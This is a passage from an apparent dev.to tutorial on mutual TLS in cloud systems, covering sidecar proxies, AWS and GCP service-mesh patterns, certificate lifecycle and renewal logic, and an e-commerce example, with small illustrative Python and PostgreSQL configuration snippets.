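        self.cert_ok = cert_ok  # models holding a valid, unexpired certificate

    def send(self, peer, plaintext):
        # Both sides must present valid certificates, or no connection exists.
        if not (self.cert_ok and peer.cert_ok):
            raise ConnectionError("mTLS handshake failed: invalid certificate")
        wire = plaintext[::-1]  # stand-in for encrypting the traffic
        return peer.receive(wire)

    def receive(self, wire):
        return wire[::-1]       # the peer proxy "decrypts" for its application
```

&lt;p&gt;The application code on either side never touches a certificate - it sends and receives plaintext over localhost, which is exactly why developers can stay focused on business logic.&lt;/p&gt;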

&lt;h2&gt;
  
  
  Implementing mTLS in Popular Cloud Platforms
&lt;/h2&gt;

&lt;h3&gt;
  
  
  AWS Implementation Pattern
&lt;/h3&gt;

&lt;p&gt;Let's see how mTLS is typically implemented in Amazon Web Services (AWS). This shows a real-world architecture pattern:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F071y9cug8unrhqfzhb5o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F071y9cug8unrhqfzhb5o.png" alt="AWS implementation pattern" width="800" height="409"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the AWS components:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Internet Users:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your customers, mobile apps, or web browsers&lt;/li&gt;
&lt;li&gt;They connect from the public internet using standard HTTPS&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Application Load Balancer (ALB):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The entry point from the internet into your AWS infrastructure&lt;/li&gt;
&lt;li&gt;Performs "TLS termination" - decrypts the incoming HTTPS traffic&lt;/li&gt;
&lt;li&gt;Uses certificates from &lt;strong&gt;AWS Certificate Manager (ACM)&lt;/strong&gt; for public-facing connections&lt;/li&gt;
&lt;li&gt;Forwards plain HTTP traffic to your internal services in this pattern - acceptable inside a private VPC, though strict zero-trust designs re-encrypt this hop as well&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;VPC (Virtual Private Cloud):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your isolated network in AWS&lt;/li&gt;
&lt;li&gt;Everything inside is protected from the public internet&lt;/li&gt;
&lt;li&gt;Think of it as your own private data center in the cloud&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;EKS Cluster (Elastic Kubernetes Service):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Managed Kubernetes environment provided by AWS&lt;/li&gt;
&lt;li&gt;Runs your containerized microservices in "pods"&lt;/li&gt;
&lt;li&gt;Each pod contains your application + an Envoy sidecar proxy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Pods with Envoy Sidecars:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Service A Pod&lt;/strong&gt; and &lt;strong&gt;Service B Pod&lt;/strong&gt; are your actual microservices&lt;/li&gt;
&lt;li&gt;Each has an Envoy proxy running alongside (the sidecar pattern)&lt;/li&gt;
&lt;li&gt;The proxies handle all mTLS communication between services&lt;/li&gt;
&lt;li&gt;Notice the bidirectional mTLS arrow between Pod1 and Pod2&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;AWS Private CA (orange box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A managed Certificate Authority service&lt;/li&gt;
&lt;li&gt;Issues certificates specifically for internal service-to-service communication&lt;/li&gt;
&lt;li&gt;These certificates are never exposed to the public internet&lt;/li&gt;
&lt;li&gt;Automatically rotates certificates to maintain security&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;AWS App Mesh (purple box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AWS's service mesh solution (built on Envoy)&lt;/li&gt;
&lt;li&gt;The control plane that manages all the proxies&lt;/li&gt;
&lt;li&gt;Gets certificates from Private CA and distributes them to pods&lt;/li&gt;
&lt;li&gt;Configures routing, security policies, and observability&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;AWS Secrets Manager:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Securely stores the private keys for your certificates&lt;/li&gt;
&lt;li&gt;Pods retrieve their keys at startup&lt;/li&gt;
&lt;li&gt;Keys are encrypted at rest and in transit&lt;/li&gt;
&lt;li&gt;Access is controlled by AWS IAM policies&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The flow of traffic:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;External&lt;/strong&gt;: User → HTTPS → ALB (using ACM public certificate)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ALB to internal&lt;/strong&gt;: ALB → HTTP → Pod1 (unencrypted inside VPC)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Service-to-service&lt;/strong&gt;: Pod1 ↔ mTLS ↔ Pod2 (secured with Private CA certificates)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Why this split approach?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Public-facing (ACM)&lt;/strong&gt;: The ALB proves its identity to internet users but does not require client certificates (one-way TLS)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Internal (Private CA)&lt;/strong&gt;: Services verify each other's identity with mTLS&lt;/li&gt;
&lt;li&gt;This separation follows the principle of "defense in depth" - different security layers for different threats&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key AWS benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Fully managed services (no certificate servers to maintain)&lt;/li&gt;
&lt;li&gt;Automatic certificate rotation&lt;/li&gt;
&lt;li&gt;Integration with AWS IAM for access control&lt;/li&gt;
&lt;li&gt;Pay only for what you use&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Google Cloud Implementation Pattern
&lt;/h3&gt;

&lt;p&gt;Now let's look at how Google Cloud Platform (GCP) handles mTLS. While conceptually similar to AWS, GCP has its own set of services and approaches:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs1ej56x3askkriplk6qd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs1ej56x3askkriplk6qd.png" alt="Google cloud implementation pattern" width="800" height="210"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the GCP components:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;GKE Cluster (Google Kubernetes Engine):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Google's managed Kubernetes service&lt;/li&gt;
&lt;li&gt;Similar to AWS EKS but with tighter integration into GCP services&lt;/li&gt;
&lt;li&gt;Provides the foundation for running your containerized workloads&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Istio Control Plane (green box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Google's preferred service mesh solution (open-source)&lt;/li&gt;
&lt;li&gt;More feature-rich than AWS App Mesh out of the box&lt;/li&gt;
&lt;li&gt;Manages all the Envoy proxies across your workloads&lt;/li&gt;
&lt;li&gt;Handles traffic management, security policies, and observability&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Workloads with Envoy:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each workload represents a microservice (similar to pods in AWS)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workload 1, 2, and 3&lt;/strong&gt; could be your user service, product catalog, and checkout service&lt;/li&gt;
&lt;li&gt;Each has an Envoy sidecar proxy automatically injected by Istio&lt;/li&gt;
&lt;li&gt;Notice the mesh of mTLS connections - every workload can securely talk to every other workload&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Certificate Authority Service (CAS) - blue box:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Google's managed CA service&lt;/li&gt;
&lt;li&gt;Issues and manages X.509 certificates for your services&lt;/li&gt;
&lt;li&gt;Integrates directly with Istio to automate certificate distribution&lt;/li&gt;
&lt;li&gt;Supports certificate hierarchies and custom policies&lt;/li&gt;
&lt;li&gt;Enterprise-focused, with features like HSM-backed CA keys and configurable issuance policies&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Workload Identity (WI):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A unique GCP feature that ties Kubernetes service accounts to Google Cloud IAM&lt;/li&gt;
&lt;li&gt;Provides each workload with a cryptographic identity&lt;/li&gt;
&lt;li&gt;Ensures that Workload 1 can only access resources it's authorized for&lt;/li&gt;
&lt;li&gt;Eliminates the need to manage service account keys manually&lt;/li&gt;
&lt;li&gt;Think of it as giving each microservice its own secure Google account&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Secret Manager:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Stores private keys, API keys, and other sensitive data&lt;/li&gt;
&lt;li&gt;Encrypts secrets at rest with Google-managed or customer-managed keys&lt;/li&gt;
&lt;li&gt;Integrated with Workload Identity for secure access&lt;/li&gt;
&lt;li&gt;Provides versioning and audit logging of secret access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The certificate flow:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;CAS → Istio&lt;/strong&gt;: Certificate Authority Service generates certificates and provides them to Istio&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Istio → Workloads&lt;/strong&gt;: Istio distributes certificates to each workload's Envoy proxy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workload Identity&lt;/strong&gt;: Authenticates each workload before allowing certificate retrieval&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;mTLS mesh&lt;/strong&gt;: All workload-to-workload communication uses mTLS (notice the bidirectional arrows between WL1, WL2, and WL3)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Key differences from AWS:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Istio is first-class&lt;/strong&gt;: GCP strongly supports Istio with managed versions and deep integration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workload Identity&lt;/strong&gt;: More sophisticated identity management than AWS Pod Identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full mesh by default&lt;/strong&gt;: Notice how all three workloads can talk to each other - GCP makes this zero-config with Istio&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Open-source focus&lt;/strong&gt;: Istio and Envoy are open-source, so you're not locked into GCP&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why this architecture matters:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Automatic encryption&lt;/strong&gt;: Once Istio is installed, mTLS is enabled without code changes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Identity-based security&lt;/strong&gt;: Services are identified by cryptographic identity, not IP addresses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No secret sprawl&lt;/strong&gt;: Workload Identity eliminates the need to distribute credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observability built-in&lt;/strong&gt;: Istio provides metrics, traces, and logs for every connection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is Google's vision of "zero trust" networking where every connection is authenticated, authorized, and encrypted regardless of network location.&lt;/p&gt;

&lt;h2&gt;
  
  
  Certificate Lifecycle Management
&lt;/h2&gt;

&lt;p&gt;One of the biggest challenges with mTLS is managing certificate lifecycles. Here's how it works in cloud environments:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgialhrs1dsi1sw2f1ndt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgialhrs1dsi1sw2f1ndt.png" alt="Certificate lifecycle management" width="800" height="1000"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the certificate lifecycle:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Certificate Request (Service Starts):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When a new service or pod starts up, it needs a certificate&lt;/li&gt;
&lt;li&gt;The service (or service mesh) sends a certificate signing request (CSR) to the Certificate Authority&lt;/li&gt;
&lt;li&gt;The request includes the service's identity (like &lt;code&gt;payment-service.prod.svc.cluster.local&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Validation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The CA verifies the request is legitimate&lt;/li&gt;
&lt;li&gt;Checks: Is this service authorized to request a certificate?&lt;/li&gt;
&lt;li&gt;Uses mechanisms like Workload Identity (GCP) or IAM roles (AWS)&lt;/li&gt;
&lt;li&gt;This prevents a rogue service from impersonating another service&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Issuance:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Once validated, the CA issues the certificate&lt;/li&gt;
&lt;li&gt;The certificate includes the service identity, public key, expiration date, and CA signature&lt;/li&gt;
&lt;li&gt;This typically happens in seconds or milliseconds&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Active (In Use):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The service is now using the certificate for all mTLS connections&lt;/li&gt;
&lt;li&gt;The certificate proves the service's identity to other services&lt;/li&gt;
&lt;li&gt;This is the normal operating state&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Monitoring:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Continuous monitoring of certificate health&lt;/li&gt;
&lt;li&gt;Checks expiration dates, revocation status, and usage patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Certificate lifetimes vary&lt;/strong&gt; (see note in diagram):

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Short-lived (24 hours)&lt;/strong&gt;: Highest security, common in modern service meshes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Medium (30-90 days)&lt;/strong&gt;: Balance of security and operational overhead&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Long (1 year)&lt;/strong&gt;: Not recommended - too much time for compromise&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;6. Near Expiry (30 days before expiration):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automated systems detect the certificate is approaching expiration&lt;/li&gt;
&lt;li&gt;Triggers the renewal process well before expiration&lt;/li&gt;
&lt;li&gt;30 days is typical, but can be configured (some systems renew at 50% of lifetime)&lt;/li&gt;
&lt;/ul&gt;
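&lt;p&gt;The renewal trigger described above - a fixed window before expiry, or a fraction of the certificate's lifetime - can be sketched in a few lines. Real systems pick one policy or combine them; the defaults below (30 days, 50%) are just the values mentioned in this section.&lt;/p&gt;

```python
from datetime import datetime, timedelta, timezone

def needs_renewal(not_before, not_after, now=None,
                  window=timedelta(days=30), lifetime_fraction=0.5):
    """Renew when we are inside a fixed window before expiry OR past a
    given fraction of the total lifetime, whichever fires first."""
    now = now or datetime.now(timezone.utc)
    lifetime = not_after - not_before
    by_window = now >= not_after - window
    by_fraction = now >= not_before + lifetime * lifetime_fraction
    return by_window or by_fraction
```

&lt;p&gt;With these defaults, a 90-day certificate renews at day 45 (50% of its lifetime fires before the 30-day window does), while a 24-hour certificate renews after 12 hours - which is why short-lived certificates depend entirely on automation.&lt;/p&gt;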

&lt;p&gt;&lt;strong&gt;7. Renewal (Auto-renewal Triggered):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The service mesh automatically requests a new certificate&lt;/li&gt;
&lt;li&gt;The old certificate continues working while renewal happens&lt;/li&gt;
&lt;li&gt;Once the new certificate is issued, it gradually replaces the old one&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;This prevents&lt;/strong&gt; (see note in diagram):

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Service disruptions&lt;/strong&gt;: No downtime during rotation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Manual errors&lt;/strong&gt;: Humans forget or make mistakes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security gaps&lt;/strong&gt;: Expired certificates mean no authentication&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;8. Back to Active:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The new certificate is now in use&lt;/li&gt;
&lt;li&gt;The old certificate may have a grace period before fully expiring&lt;/li&gt;
&lt;li&gt;The cycle continues&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Alternative paths:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Revoked (Security Incident):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If a private key is compromised or a service is breached&lt;/li&gt;
&lt;li&gt;The certificate can be immediately revoked&lt;/li&gt;
&lt;li&gt;Other services will refuse connections from this certificate&lt;/li&gt;
&lt;li&gt;The service must get a new certificate before resuming operations&lt;/li&gt;
&lt;li&gt;Ends the lifecycle prematurely&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Expired (Renewal Failed):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If automatic renewal fails (CA unavailable, network issues, configuration problems)&lt;/li&gt;
&lt;li&gt;The certificate expires and becomes invalid&lt;/li&gt;
&lt;li&gt;Services will reject connections from expired certificates&lt;/li&gt;
&lt;li&gt;This typically triggers alerts and requires immediate attention&lt;/li&gt;
&lt;li&gt;The service must request a new certificate to resume operations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why automation is critical:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Imagine managing this manually for hundreds or thousands of services:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You'd need to track expiration dates for every certificate&lt;/li&gt;
&lt;li&gt;Rotate them before expiration without causing downtime&lt;/li&gt;
&lt;li&gt;Ensure no service uses an old certificate&lt;/li&gt;
&lt;li&gt;Respond immediately to security incidents&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With automation, this entire lifecycle happens without human intervention: certificates can rotate as often as every 24 hours without downtime, and a security incident triggers immediate revocation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Real-World Example: E-commerce Platform
&lt;/h2&gt;

&lt;p&gt;Let's see how mTLS secures a cloud-based e-commerce platform. This example shows where TLS and mTLS are used in a realistic production environment:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff1v3csoe6kcs0x4yhg4g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff1v3csoe6kcs0x4yhg4g.png" alt="e-commerce platform" width="800" height="555"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let's trace a customer's journey through this system:&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Customer-Facing Layer
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mobile App and Web Browser:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your customers interact with your platform through these interfaces&lt;/li&gt;
&lt;li&gt;They use standard HTTPS (TLS) to connect&lt;/li&gt;
&lt;li&gt;Customers don't have certificates - they authenticate with login credentials&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Edge Layer - The Security Boundary
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;CDN (CloudFront/Akamai/etc.):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Content Delivery Network that caches static content&lt;/li&gt;
&lt;li&gt;Uses regular TLS to serve images, CSS, JavaScript to customers&lt;/li&gt;
&lt;li&gt;Provides DDoS protection and global distribution&lt;/li&gt;
&lt;li&gt;This is where the public internet meets your infrastructure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;API Gateway (red box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Critical transition point&lt;/strong&gt; where security changes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Incoming&lt;/strong&gt;: Accepts TLS connections from the CDN (public-facing)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Outgoing&lt;/strong&gt;: Uses mTLS for all internal service communications&lt;/li&gt;
&lt;li&gt;Acts as the "trust boundary" - everything behind it requires mutual authentication&lt;/li&gt;
&lt;li&gt;Validates user JWT tokens or session cookies before forwarding requests&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Application Layer - The mTLS Zone
&lt;/h3&gt;

&lt;p&gt;This is where your business logic lives, and every connection requires mTLS:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Product Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Manages the product catalog&lt;/li&gt;
&lt;li&gt;API Gateway calls it to display products to customers&lt;/li&gt;
&lt;li&gt;Cart Service calls it to validate products being added&lt;/li&gt;
&lt;li&gt;Connected to Product DB to fetch inventory details&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Cart Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Manages shopping cart operations&lt;/li&gt;
&lt;li&gt;Talks to Product Service to verify item details&lt;/li&gt;
&lt;li&gt;Talks to Inventory Service to check stock availability&lt;/li&gt;
&lt;li&gt;Stores cart data in Redis Cache for fast access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;User Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Handles user profiles and preferences&lt;/li&gt;
&lt;li&gt;Authenticates user sessions&lt;/li&gt;
&lt;li&gt;Order Service calls it to get shipping addresses&lt;/li&gt;
&lt;li&gt;Connected to User DB for persistent storage&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Order Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Orchestrates the order creation process&lt;/li&gt;
&lt;li&gt;Calls Payment Service to process transactions&lt;/li&gt;
&lt;li&gt;Calls Inventory Service to reserve stock&lt;/li&gt;
&lt;li&gt;Calls User Service to get customer details&lt;/li&gt;
&lt;li&gt;Stores completed orders in Order DB&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Payment Service (dark red box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Most sensitive service&lt;/strong&gt; - handles financial transactions&lt;/li&gt;
&lt;li&gt;Protected by mTLS on all sides&lt;/li&gt;
&lt;li&gt;Only Order Service can call it (enforced by mTLS certificates)&lt;/li&gt;
&lt;li&gt;Communicates with external Payment Gateway using mTLS&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Inventory Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Tracks stock levels across warehouses&lt;/li&gt;
&lt;li&gt;Called by both Cart and Order services&lt;/li&gt;
&lt;li&gt;Prevents overselling by managing reservations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Data Layer - Database Security
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;All database connections use mTLS:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Product DB&lt;/strong&gt;: Stores product catalog data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User DB&lt;/strong&gt;: Contains sensitive customer information&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order DB&lt;/strong&gt;: Stores order history and transaction records&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Redis Cache&lt;/strong&gt;: Fast in-memory data store for cart sessions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why mTLS for databases?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Prevents unauthorized services from accessing data&lt;/li&gt;
&lt;li&gt;Even if an attacker breaches your network, they can't connect to databases without valid certificates&lt;/li&gt;
&lt;li&gt;Provides audit trail of which services accessed what data&lt;/li&gt;
&lt;/ul&gt;
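
&lt;p&gt;As one concrete (and hedged) illustration: PostgreSQL can enforce the client-certificate side of mTLS in &lt;code&gt;pg_hba.conf&lt;/code&gt; with the &lt;code&gt;cert&lt;/code&gt; auth method, which rejects any connection lacking a certificate signed by the server's configured CA. The database name, role, and address range below are placeholders, not values from this architecture:&lt;/p&gt;

```
# pg_hba.conf sketch: TLS is required AND the client must present a
# certificate whose CN matches the connecting role ("cert" auth method)
# TYPE    DATABASE  USER       ADDRESS       METHOD
hostssl   orders    order_svc  10.0.0.0/16   cert
```

&lt;p&gt;With a rule like this, a caller without a valid client certificate cannot even authenticate - exactly the "no certificate, no access" property described above.&lt;/p&gt;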

&lt;h3&gt;
  
  
  External Services
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Payment Gateway (dark red):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Third-party service (Stripe, PayPal, etc.)&lt;/li&gt;
&lt;li&gt;Requires mTLS for PCI DSS compliance&lt;/li&gt;
&lt;li&gt;Your Payment Service must present a valid certificate&lt;/li&gt;
&lt;li&gt;The gateway also presents its certificate to you&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Shipping API:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Integration with shipping providers (FedEx, UPS, etc.)&lt;/li&gt;
&lt;li&gt;Uses mTLS to ensure only your Order Service can create shipments&lt;/li&gt;
&lt;li&gt;Prevents fraudulent shipping labels&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Example: Customer Purchases a Product
&lt;/h3&gt;

&lt;p&gt;Let's trace the mTLS connections when a customer buys a product:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Customer clicks "Buy Now"&lt;/strong&gt; → TLS → CDN → API Gateway&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Gateway → User Service&lt;/strong&gt; (mTLS): Verify user is logged in&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Gateway → Cart Service&lt;/strong&gt; (mTLS): Get cart contents&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cart Service → Product Service&lt;/strong&gt; (mTLS): Validate product details&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cart Service → Inventory Service&lt;/strong&gt; (mTLS): Check stock availability&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Gateway → Order Service&lt;/strong&gt; (mTLS): Create order&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order Service → Payment Service&lt;/strong&gt; (mTLS): Process payment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Payment Service → External Payment Gateway&lt;/strong&gt; (mTLS): Charge credit card&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order Service → Inventory Service&lt;/strong&gt; (mTLS): Reserve stock&lt;/li&gt;
&lt;li&gt;
